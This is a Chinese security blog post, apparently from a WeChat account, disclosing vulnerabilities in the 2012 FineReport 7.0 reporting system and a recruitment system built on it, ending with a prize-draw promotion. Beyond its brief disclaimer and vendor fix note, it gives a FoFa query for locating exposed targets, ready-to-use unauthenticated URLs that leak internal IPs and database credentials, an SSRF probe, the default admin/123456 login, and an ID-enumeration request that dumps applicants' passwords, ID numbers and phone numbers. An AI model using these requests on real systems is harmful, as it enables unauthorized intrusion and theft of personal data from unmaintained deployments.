前言
申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
五一假期,给大家发个Day+抽一波奖!
(抽奖推文在公众号发的最新的文章中)
这个曾经团队刚开始运作时已经发过了,这次写详细点拿出来分享!
此漏洞由团队老大 小小小月球 及 goddmeon 一起挖的
在此感谢小小小月球&goddmeon
Part 1 漏洞背景
帆软报表系统是一款纯Java编写的、集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。
Part 2 漏洞描述
帆软报表系统历史版本存在默认口令及未授权访问漏洞。
攻击者可利用漏洞获取敏感信息,并执行未授权操作。
Part 3 漏洞影响范围
属于2012年的历史版本
此版本现已不再维护
Part 4 FoFa语法
"down.download?FM_SYS_ID" && title="招聘"
Part 5 漏洞复现
帆软报表系统2012版本存在未授权访问+内网数据库用户名密码泄露+通用弱口令
未授权部分
1.未授权查看访问内网ip
http://XXXXXX/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
2.未授权重置授权
http://XXXXXX/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false
3.查看数据库密码
http://XXXXXX/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
4.SSRF
http://XXXXXX/ReportServer?op=resource&resource=dnslog地址
5.默认弱口令
后台地址:/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619795319853口令:admin / 123456
在挖掘这个报表系统漏洞的过程中,发现这个报表系统是搭载在一个招聘系统的后面的
(感觉这其实是帆软的招聘系统,而这个招聘系统用到了帆软报表)
有可能也不是这样的,欢迎师傅指正!
既然帆软报表系统的洞都发了,这个招聘系统的洞也顺便发出来吧!
访问下面这个地址,先注册个账户,
注意一下url中的
FM_SYS_ID参数不是固定的,每个网站是不一样的
https://XXXXXX/project/shyyxy/default/recruitLogin.jsp?FM_SYS_ID=XXXXXX&FM_SYS_CODE=SYSTEM_RECRUIT#
测试账户 XXXXXX XXXXXX
登录进去后,点击我的申请再抓包,有个 id 参数可以遍历。
可以看到很多id存在,就不一一测试了
改成2138后(2138是一个特殊的id值),点新增
然后点击申请人框框处,发现输出了所有账户和密码(身份证电话等敏感信息)
图中4Q开头的密码为123456
另一个接口处同样存在这个漏洞
登陆后访问
再次提醒,url中的
https://XXXXXX/base/hr/a.do?action=list&entityId=HR_RECRUIT_USER&FM_SYS_ID=XXXXXX&_dc=1615462290692&columnFieldNames=ID,ACCOUNT,NAME,PASSWORD,EMAIL,REGISTER_DATE,PHONE,TYPE#,ID_CODE,IS_LOGIN#&search.NAME#like=&searchMode=simple&page=1&start=0&limit=500
涉及信息过多,打厚码
Part 6 修复建议
受影响的是 FineReport 7.0 版本,属于公司2012年的历史版本,此版本现已不再维护。
漏洞中提及的客户近期已联系修改系统密码来降低风险,若还有其他客户有类似问题,需要主动联系官方技术支持咨询下处理方案,技术支持方式见
https://www.fanruan.com/support
Part 7 关于抽奖
大家可以看下另一篇今天发的抽奖文章哈
奖品为:
1、某大学漏洞报送证书*1
2、安全相关书籍(可选,具体书单在推文中)*1
3、金士顿32G USB3.0 U盘*1
4、edusrc邀请码*4
那就长按二维码,关注我们吧!
本文始发于微信公众号(F12sec):漏洞复现 |(通用0day)帆软报表系统历史版本存在多处漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论